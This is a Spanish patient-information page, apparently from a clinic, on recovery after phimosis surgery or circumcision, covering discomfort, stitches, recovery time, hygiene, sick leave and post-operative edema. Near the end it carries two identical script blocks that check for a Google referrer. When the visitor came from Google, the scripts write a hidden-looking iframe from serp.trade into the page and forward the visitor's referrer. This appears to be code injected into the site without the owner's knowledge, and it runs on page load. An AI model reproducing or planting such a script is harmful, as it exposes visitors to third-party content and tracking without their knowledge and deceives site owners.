Recuperación tras la Operación de Fimosis

¿Cómo es la evolución tras la operación de fimosis?

Durante los primeros días es muy posible que el paciente, para obtener una sujeción mayor, prefiera utilizar calzoncillos tipo slip. La zona del frenillo es la que más tarda en cicatrizar porque cuando se producen las erecciones, se somete a mayor presión y tirantez.

Postoperatorio de Circuncisión o Fimosis

¿Cómo es el postoperatorio de una Operación de Fimosis o Circuncisión?

El postoperatorio de esta cirugía resulta bastante cómodo para el paciente, ya que apenas sentirá dolor o molestias. En cuanto al reposo, el paciente deberá seguir las indicaciones de su cirujano, y descansar al menos durante las horas posteriores a la cirugía y no hacer esfuerzos como coger peso. La Circuncisión está considerada como una cirugía sencilla, en la que además el paciente se puede ir a casa en el mismo día sin necesidad de pasar la noche en el hospital o centro médico.

Como norma general, algunas de las molestias más frecuentes son:

  • Inflamación y leve sangrado
  • Dolor e hipersensibilidad

¿Cuánto tiempo dura la recuperación de la circuncisión?

En este tipo de intervenciones se utilizan puntos reabsorbibles, que tardan aproximadamente 3 semanas en ser reabsorbidos.

El tiempo de recuperación, depende de cada paciente, pero en unas 2-3 semanas estará recuperado. Ante cualquier duda, consulte a su cirujano.

Al mes, desaparecen prácticamente las molestias y el paciente puede retomar la actividad sexual. 

Tras la operación de fimosis el paciente no pierde sensibilidad sexual.

Recuperación de Fimosis en adultos

Cuidados tras la Circuncisión

Después de la operación, es necesario curar los puntos cuidadosamente para que la recuperación sea lo más llevadera posible.

Resulta de vital importancia mantener una higiene íntima, con lavados diarios, para evitar que la herida se infecte. 

¿Es necesario pedir baja laboral?

Días de baja para la Operación de Fimosis o Circuncisión

Esta cirugía generalmente no requiere de baja laboral. Es de carácter ambulante, lo que significa que el paciente puede regresar a su casa tras la operación y realizar allí reposo.

Dependiendo del tipo de trabajo que desempeñe el paciente, serán necesarios más o menos días de reposo. El trabajo de oficina, no requiere de una baja laboral, por ejemplo, ya que el paciente permanecería sentado sin realizar esfuerzos físicos. 

El propio médico valorará junto con el paciente y le recomendará si fuera necesario pedir unos días de baja en su trabajo.

Solicita una consulta informativa para preguntar las dudas que tenga sobre la cirugía con el Doctor.

 

tipos de fimosis

¿Qué posibles complicaciones fimosis existen?

Solamente surgen complicaciones en el 2% de las intervenciones de fimosis. Tras la cirugía  es habitual que se produzcan las siguientes molestias:

  • Hinchazón del glande. 
  • Mayor sensibilidad en el glande.
  • Aparición de algún hematoma. 

Si a las dos semanas los puntos de sutura no han caído por sí solos, es aconsejable acudir al médico para que pueda quitarlos en la consulta.

 

 

¿Qué es el flotador fimosis?

 

El «flotador» es como se denomina al edema que se forma tras esta cirugía. Consiste en una bolsa de líquido linfático que se va drenando con el paso de los días, se alisa y se disuelve poco a poco. El “flotador” no duran más de dos meses. El edema desaparece momentáneamente cuando el pene se pone erecto. 

 

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>

Artículos de interés

Importante: Esta información tiene únicamente un carácter informativo y en ningún caso médico. Es importante que consulte a su médico sobre su enfermedad específica y el tratamiento más adecuado.

<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>
Call Now ButtonLlama ahora